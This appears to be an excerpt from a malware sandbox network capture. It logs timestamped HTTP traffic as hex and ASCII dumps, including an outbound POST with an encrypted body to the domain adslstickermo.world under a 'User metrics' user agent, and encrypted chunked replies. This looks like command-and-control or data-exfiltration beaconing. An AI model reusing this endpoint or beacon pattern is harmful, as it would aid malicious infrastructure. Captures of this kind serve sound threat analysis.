2024-01-03 17:26:51 UTC	793	IN	Data Raw: 31 38 38 35 0d 0a 22 da c1 14 c5 f7 6c d5 2b de 29 68 4e 08 31 c6 9f a1 87 52 eb 9e 34 4e 64 89 4d 08 b0 9f 60 f5 ef 79 be a5 07 69 84 af 69 27 ec 29 02 86 4a ea b7 19 f6 e1 b5 5f 74 ab 78 29 0c a5 79 80 cb 0a c9 1d 41 b9 97 3a 49 0d 0f 35 b7 80 3d cc d2 f7 d8 30 b5 31 d8 ee 79 a5 01 70 cc 91 41 ad 27 d6 a6 75 6b 4d 21 c0 5e 6a 5a 1c de 7f fc 54 5c eb 19 c3 4a 60 ed 63 1b 32 2f b4 56 01 8d 59 85 1b bf 44 db 61 f2 50 2a 34 76 f6 a2 db c0 4a 58 72 36 7c 3b f1 8a ea 4e 7d da 04 0d 8c f7 4d 11 45 3c b7 9d f9 c0 a3 c8 dc f2 2a 25 24 3f 76 8c cb cf 7c 27 f7 be f1 c7 de e4 1f 2e fa 90 a6 f8 60 2e 18 0d b0 ff b6 dd d1 a8 23 76 51 17 74 c7 23 8a fc 3b 1b 81 df 0f fa ae 8e 6c 37 78 e3 57 86 19 da 0d 75 64 ae e9 07 6a 35 b7 45 e3 37 f8 85 10 70 03 d8 71 6e 7e cd 5a Data Ascii: 1885"l+)hN1R4NdM`yii')J_tx)yA:I5=01ypA'ukM!^jZT\J`c2/VYDaP4vJXr6\|;N}ME<%$?v\|'.`.#vQt#;l7xWudj5E7pqn~Z
2024-01-03 17:26:51 UTC	1369	IN	Data Raw: d7 7f 55 08 d1 ac 9b f3 c1 ee cb f7 1e 9d 0d e9 f3 fd 94 0a 7b b7 28 3e 97 f7 21 bb 3b 58 b9 69 7e 53 59 87 52 33 20 91 1a 86 00 9f 66 c0 f9 50 44 c3 65 28 12 a6 c5 89 96 a4 fe 51 18 99 97 75 b6 5e ab e5 12 4c 49 93 9c 4b c4 69 3a 9f e8 1e 49 a2 f1 58 fc f9 34 2a 93 2e a6 b0 e5 9f fa 0b 6b cc 76 19 97 cb ad 79 7b ca 7a 32 32 37 aa 63 bc f5 ca 66 f2 56 1e ac 95 9d 3f 93 22 f6 07 70 b0 0d 9e 8a 8f 01 9f ea 1b ca 6e 8b f1 1a ee 6c 03 f3 71 ae 26 7b 86 7b 98 a1 9f 68 5f 49 e8 32 c8 5e af 3a 91 7d 41 e0 4c 81 ed c9 4b cc ee e9 9e cc df 1c 9a 4f c9 7e b8 6e 92 2c 1f d0 74 f7 13 71 17 86 cf 65 88 3a 83 82 e5 2a 36 70 90 97 c0 a3 c8 4b ee ac dc 5b db a6 29 1f 27 0a b4 c7 8a a1 82 b3 cc 3f 15 29 b8 92 32 93 62 5e f3 8c 87 37 1c cb b6 b8 c5 f3 92 7c bb 25 0a 38 c1 Data Ascii: U{(>!;Xi~SYR3 fPDe(Qu^LIKi:IX4.kvy{z227cfV?"pnlq&{{h_I2^:}ALKO~n,tqe:6pK[)'?)2b^7\|%8
2024-01-03 17:26:51 UTC	1369	IN	Data Raw: 96 5e bd 14 18 b0 74 31 43 da 7e 8a 10 5a 66 14 1e 61 24 6f b6 c6 5f c6 f9 ee 3c f3 98 d1 b8 0d 7f d4 00 1d 61 d7 89 49 ca 2c 9d 75 d7 cf 10 24 dc 70 80 ec 53 ce a3 03 a6 31 d1 1d 3f 83 70 8d 92 20 3c 4f 59 bf 76 24 76 5c 26 bc 8d 29 96 c5 c7 eb 24 bf d2 51 b8 b8 7d 47 79 b2 09 1a af b1 0e b9 1f 6c 61 00 87 4a 75 21 4c a1 ee 4c e0 a3 3a 31 93 84 27 26 19 8d 31 26 06 79 60 31 a0 87 1d 5a e3 9c c0 7d 72 83 98 88 0f b8 d2 4d 19 0c f5 84 12 e1 e7 36 a1 78 2c 14 fd 5c 77 0b 21 79 5a d8 53 7f 3a bf a7 91 6b a0 16 a2 aa c3 0e 71 64 0d 5f 17 8a 36 2a e5 20 7c b6 d2 d3 3a 73 3c 74 0b fe 8f cf 55 b7 67 2c e9 ad 1f 44 3c 29 fc 8a c4 17 95 30 f6 7b 89 a9 b1 be 9e 31 ca 39 b7 5c 51 c0 0b 9e 17 55 14 d1 fc 97 0a 87 f2 7b 55 d1 92 13 1d f5 a6 7b bf 32 15 fa a6 ce 36 94 Data Ascii: ^t1C~Zfa$o_<aI,u$pS1?p <OYv$v\&)$Q}GylaJu!LL:1'&1&y`1Z}rM6x,\w!yZS:kqd_6* \|:s<tUg,D<)0{19\QU{U{26
2024-01-03 17:26:51 UTC	1369	IN	Data Raw: dc 78 72 f8 e0 75 15 f2 0d 0e 53 b2 cc 3c c1 a2 a8 00 a2 73 61 f3 e9 7c cc dd 5c 12 57 3b 33 53 b3 26 c7 d2 f8 d0 fb 97 7b 64 d9 e0 8b 33 f4 b9 14 c3 ca 36 f5 96 f7 b0 b7 1c ce 92 7d 4b 18 56 34 65 ec 71 3e 65 b1 08 ef b5 c3 30 55 8f fa 12 8d fe 89 6e 42 bb c2 00 d9 5d d0 9d e2 a6 9f 58 51 05 cf 41 2e c8 32 6d 0a 99 f7 67 74 7e 6a 1d 4c f3 42 de 73 f4 8e b0 36 e7 ba c6 93 98 9c db 96 e5 ae 3f 0e 22 25 4e 08 90 9b b3 d6 0b d2 04 b3 80 6d e2 14 63 24 c2 0d 95 0d 13 ad c7 bb 61 dc ca ef 4b d8 b6 70 0e e8 53 9f b3 e8 25 21 ba 22 84 35 84 86 6a 6d 8b ef c1 26 e4 bb e5 a8 dc f1 5b 91 a7 4b 50 6a 7e bb 89 95 7f 3c aa d8 a0 43 66 9b 84 0d 02 9b bd d3 ad f0 af de c4 14 c1 e0 0a 60 da b0 fb e6 ab 96 90 2e 6f 04 40 12 80 1d d9 5e 25 64 f0 e4 3f d0 00 5c d8 8b 4e 0a Data Ascii: xruS<sa\|\W;3S&{d36}KV4eq>e0UnB]XQA.2mgt~jLBs6?"%Nmc$aKpS%!"5jm&[KPj~<Cf`.o@^%d?\N
2024-01-03 17:26:51 UTC	1369	IN	Data Raw: 5f e3 24 a7 88 35 99 64 8c c0 20 f3 b6 14 8d 7d 1c 24 be 65 48 af 37 74 64 5d 15 2e b7 ef 7b f2 45 df 3f 13 3c f4 2a 7b 74 5a ef d9 82 29 3e 48 98 9a 5e 86 58 30 d7 8f 61 44 35 04 e1 ab 04 d1 f4 73 1c 68 43 10 b4 a5 f7 ed 55 2a f6 c8 ec c7 30 35 4c 93 a9 86 ee fc b4 7c f8 e9 c8 94 56 16 28 37 22 ba f8 88 42 eb 7e 5c 81 4b 46 b1 51 bf 48 ed 18 fd 5c 62 76 69 0d 66 d4 f3 c9 0a 7f f7 bb 4e 50 fb 3f 8c 6a f1 65 f4 82 76 04 72 1d 8f 67 ce e3 0f 57 bc 12 6f 92 74 ea 26 d7 a8 00 ab 81 ac 91 c7 38 ed b5 22 dd b0 88 e5 0f b3 97 a7 46 11 2a 7c ac 0f bc 59 54 24 ec a6 53 58 9e ab 22 54 01 08 ca b2 0d 20 8b 26 4b b3 b7 58 04 96 de 8c de 98 a1 e8 9e 9b cb a4 8a 04 f1 f1 b3 e5 0d 84 ff 2e 7c 87 02 2c 43 09 18 64 3e 15 c2 1b 9c d3 df dc 02 36 04 88 66 a0 a0 e2 44 3d 4a Data Ascii: _$5d }$eH7td].{E?<{tZ)>H^X0aD5shCU05L\|V(7"B~\KFQH\bvifNP?jevrgWot&8"F*\|YT$SX"T &KX.\|,Cd>6fD=J
2024-01-03 17:26:51 UTC	16	IN	Data Raw: 37 29 c2 51 8e 7d 1c b0 37 14 af 6a 6d ac 0d 0a Data Ascii: 7)Q}7jm
2024-01-03 17:26:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-01-03 17:26:53 UTC	151	OUT	POST / HTTP/1.1 Accept: / User-Agent: User metrics Host: adslstickermo.world Content-Length: 4512 Connection: Close Cache-Control: no-cache
2024-01-03 17:26:53 UTC	4512	OUT	Data Raw: 81 d4 83 2e ee 2e 51 d5 3c f1 67 b7 1f 03 2b 13 99 77 99 b6 41 16 a6 da 22 60 a2 a4 51 b0 e9 57 2f 73 a1 64 f8 65 62 dc c0 9a ef 01 38 cd f9 43 55 d7 71 8b 0d 21 07 20 e5 cb ef 16 3c 16 38 07 a9 e6 c6 52 ca 5b 37 61 a4 6e 11 24 38 e9 9a 21 70 d9 37 bc fb c6 be b0 34 74 99 3f af fc 59 bb 74 03 9a 83 e7 f2 c1 34 b6 07 c3 f6 7a 62 b4 97 85 e4 14 d2 96 34 23 d1 ff 99 d5 64 8d 88 c3 7b ff 5e 4a 5b 21 7b 6f ee eb 36 a1 0c d4 b2 e5 4c 03 b4 dc 71 3b 47 66 26 bf 21 95 b6 1f be a6 6a 38 00 7d d6 9b 5a b5 7c fe b6 39 c9 bb 03 a4 70 a5 1d 58 a7 82 3c 45 cc 74 89 0d 4f 89 31 9b 5b 48 1e ad 5b df 3c f7 98 aa be c7 4a cc b9 cf b1 fd 83 8e 27 9b eb fa d3 af 5c df 02 8b 5d 48 67 ba a0 d3 f6 e3 9c b3 96 29 a9 2b b8 bc 97 ab 59 81 95 4a cd 6a 40 70 f6 46 55 ac 59 42 3a dc Data Ascii: ..Q<g+wA"`QW/sdeb8CUq! <8R[7an$8!p74t?Yt4zb4#d{^J[!{o6Lq;Gf&!j8}Z\|9pX<EtO1[H[<J'\]Hg)+YJj@pFUYB:
2024-01-03 17:26:53 UTC	572	IN	HTTP/1.1 200 OK Date: Wed, 03 Jan 2024 17:26:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2pPWmO6Awg0HW4ZqrsZ%2BhRufDMoPbWFhVHbzHWOYfPFJAlbxiPEG1Lnr7mZy6eUSfgcMyghucbSankUpvelQDmIEIWguX4GvND0xLUUcmxg4BGcdQg9Md8Ypa1LKbZxBwSsLI0Bq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83fcf3069afbe99b-DFW alt-svc: h3=":443"; ma=86400
2024-01-03 17:26:53 UTC	797	IN	Data Raw: 31 38 38 35 0d 0a 26 0e c1 95 d9 4c de 21 1c ea 36 3e 84 f5 62 a9 70 25 4b e9 06 73 52 12 8b 15 a1 82 26 87 9f 53 e0 c4 69 6b c3 75 fb 80 d0 91 b5 28 1d c6 f7 02 cf 7b 3e c1 e4 5a 23 aa 16 eb 6f 2d ef 57 fd 3d d3 a2 11 e6 45 81 4a 25 13 07 7e f3 75 00 76 08 40 3e 33 9a 38 63 72 5b 0f db 58 85 c4 12 07 28 39 23 50 75 35 08 70 7b a0 58 bf 17 13 68 32 a9 12 67 89 3c b1 fe b6 55 da e9 7d fb 54 f7 70 5d 3f c4 e3 9e 1d 3d 2b 7d 46 c0 15 e8 94 00 a3 b1 90 f3 be 91 a8 05 3a fd 84 4f 72 56 d7 0d b7 8a 65 42 47 a7 f7 a2 30 27 cc b7 70 6d 64 09 6e d7 16 e3 41 76 b2 7b c8 6f 1d 56 f5 d9 55 d8 4e 0e 4a 02 56 64 f8 4a 16 ac 71 9e e6 d2 6a 17 8a bd 87 fc 6e 58 9d 6a 06 33 5b f3 f3 6c 0a 9e 62 83 cc e8 88 a1 09 33 e0 c0 eb 2c e6 d3 b4 f7 88 c5 37 26 7d b2 07 0d 49 6e 89 Data Ascii: 1885&L!6>bp%KsR&Siku({>Z#o-W=EJ%~uv@>38cr[X(9#Pu5p{Xh2g<U}Tp]?=+}F:OrVeBG0'pmdnAv{oVUNJVdJqjnXj3[lb3,7&}In
2024-01-03 17:26:53 UTC	1369	IN	Data Raw: 41 2e bd f4 56 61 08 23 92 fb 76 cd e2 90 fb 8c 4f 45 77 db 81 e9 59 c2 48 09 3b 07 83 75 75 04 bb 74 5c bd 6f 4c e3 89 fd e2 0c 14 65 84 06 dc cf aa 62 12 7e 3c eb 37 db 94 1c bc 06 c5 6e e4 5c d4 97 7c 8d 10 6f 14 2d 76 42 73 61 8c 4c cb 25 50 a2 13 4c 36 e4 00 b9 f4 f5 8a 3e 98 77 f0 c5 36 d8 32 38 14 29 47 7b 5a fa 28 8e e9 47 6c aa c5 b5 a9 f1 5a 17 24 36 48 7d 4f 6b 82 c3 de ca e4 5c 11 c6 13 8d 5e 16 cc a2 4b 95 5b 93 1e 9f 36 8a d5 18 34 b1 4c 90 49 7f 2d d1 14 79 68 0a 06 b9 4e 6f 03 50 48 30 56 2c 10 be 93 66 a2 0c d8 de 23 04 00 32 48 16 9f 79 e7 7f 4f b3 40 53 44 f3 ac 21 e0 23 9c d4 f8 c5 f0 3b 89 62 27 99 73 8a 1b f3 1f 51 98 4e b6 98 0f 67 f8 ad 40 35 ff d6 44 ea 6b 86 cb c1 f2 39 62 ff 6d 4e 2b 80 7f 91 33 cd 4d 48 bc ba 8f af c5 b6 c6 3f Data Ascii: A.Va#vOEwYH;uut\oLeb~<7n\\|o-vBsaL%PL6>w628)G{Z(GlZ$6H}Ok\^K[64LI-yhNoPH0V,f#2HyO@SD!#;b'sQNg@5Dk9bmN+3MH?
2024-01-03 17:26:53 UTC	1369	IN	Data Raw: 8b 6d 9d df da ca 72 a8 b4 f7 53 fa cc bd 0c ea f3 4c 42 fb 30 89 56 f5 30 7e 39 b0 ee 08 37 67 e0 03 e1 11 b1 50 74 22 96 71 bc 04 ad 7c 98 2d 70 ff 7a 30 d7 5b a3 66 9e bf ec 95 23 1a de e8 14 3a 09 62 96 bd 43 a2 80 6c ec af f0 a0 87 93 02 e6 e0 14 64 b2 cc cf e0 7a 58 6c f0 dd 5e 8b 37 de 72 28 e3 78 67 9c 3c e5 5c ff 30 0e 19 a3 8f b0 a9 7f d2 70 9e 97 05 0a d2 48 ee cd ce e9 95 f0 85 23 e6 25 08 36 aa de 17 d6 fa 85 c4 ad 83 eb 7d c0 45 b6 34 fd 3f d2 58 b8 89 9b 2f a8 3c f3 3a b3 14 f8 c5 0c 0c 81 3e 6a 40 41 73 4c b0 d7 87 c1 50 88 0d 3e 89 55 5a c5 05 ab 1b bc d3 6d 67 ec 66 d3 1f 2f 50 6c fa 4f 34 c4 ee 1e 5a d0 76 f3 3d c5 11 de 12 1b c0 a6 c5 7c ed 94 47 c3 3a d3 27 43 3c 59 59 55 f7 44 f6 13 df 0e df 39 fc fa 43 d9 39 2d 36 57 68 64 bb 2d 59 Data Ascii: mrSLB0V0~97gPt"q\|-pz0[f#:bCldzXl^7r(xg<\0pH#%6}E4?X/<:>j@AsLP>UZmgf/PlO4Zv=\|G:'C<YYUD9C9-6Whd-Y
2024-01-03 17:26:53 UTC	1369	IN	Data Raw: 5a d3 65 ef 48 27 4b f1 ce 4a 98 5a 6b 4c 81 1f 52 6a d4 1a fb c4 e1 ff b9 5b 44 4b dd c3 14 46 3b 9f 92 3b fd fe 36 54 88 4a 5f 33 be 1d f8 63 d5 6e f6 06 b5 b3 f6 06 77 47 52 b9 21 6e 92 76 b7 5d 3c 73 07 f2 6b cc 1f d2 d2 d3 d8 a9 c0 47 5a 43 9c 02 82 65 1c 0d ee ea 1d 35 b0 2c ca 93 10 c7 38 4c c7 e6 b0 cc c5 41 95 b2 df a7 8d 5e 51 6d 26 ff 9d 9d 8d 98 86 52 fe c9 72 71 d0 9e 82 a8 fa cf 57 93 46 40 fe 40 08 82 d7 02 0f b5 0d ed 63 54 a9 2b b6 a3 23 44 8a 20 b6 c0 70 a2 9e 3f bf ac 9b 5c d4 5e 91 b4 48 0e ec d3 4a 5a 39 d2 de 20 1f d4 a8 2f e0 fc 0a 45 bd e2 ba 4c b7 d1 91 84 39 7a 73 da b7 c4 68 10 28 31 d7 57 5f 8e 68 71 b3 a6 33 b0 76 ed 9d 81 e1 a3 de 5d 48 35 12 16 d0 b7 f5 d0 23 65 ea 15 85 12 c6 e2 18 96 60 8f 98 2c cb 23 18 36 fc 46 c3 fc c8 Data Ascii: ZeH'KJZkLRj[DKF;;6TJ_3cnwGR!nv]<skGZCe5,8LA^Qm&RrqWF@@cT+#D p?\^HJZ9 /EL9zsh(1W_hq3v]H5#e`,#6F
2024-01-03 17:26:53 UTC	1369	IN	Data Raw: e2 d9 a0 5c 5a 79 04 60 1f d5 8f 72 5b 4d 9f 45 89 7e c6 7c f5 d5 1a db 4c 28 45 1b 94 f1 fe ec 61 05 e3 b7 05 9d 63 05 55 b3 a5 13 ee bf e1 59 72 0c f4 18 f2 28 e8 35 17 2c e2 c8 2f 5b fc 30 8b 2e a0 7c cc 38 ce 56 26 58 db 47 d4 80 84 6a 06 7f 79 3a f5 ef d5 bf d0 4a 7c da 49 c0 92 b6 88 f8 4d e2 b9 0d f4 ee a1 22 cf 4d 1f 8d ea c9 75 d4 e6 75 03 09 c3 6d 52 b0 84 c0 c6 ec e2 b2 0d f1 0d e2 3c 0e a7 69 7d a0 3a 4d 2f 40 f4 0f 0b 57 be 03 e1 40 7d 61 02 48 3a d4 e7 20 e0 8a 86 f8 2b 17 1e 59 48 1c 14 37 3f 27 15 54 b9 11 ac 42 fc 4e f9 8b 2e 40 60 b4 83 c6 93 13 36 bc f9 9a 4a 30 34 e4 b4 f9 7b 63 da 94 9f 55 80 25 9e ee a2 81 e5 ad 66 35 ca 32 3a 9b 78 a3 28 f8 5e fb 3e 31 2d f4 7e f0 60 a4 fc e5 1b e3 b1 8a f6 05 f1 fe b2 44 61 3c c6 fe b4 3e 4f f3 4d Data Ascii: \Zy`r[ME~\|L(EacUYr(5,/[0.\|8V&XGjy:J\|IM"MuumR<i}:M/@W@}aH: +YH7?'TBN.@`6J04{cU%f52:x(^>1-~`Da<>OM
2024-01-03 17:26:53 UTC	12	IN	Data Raw: 42 a9 37 3c 3c d8 8d cf 5b 85 0d 0a Data Ascii: B7<<[
2024-01-03 17:26:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0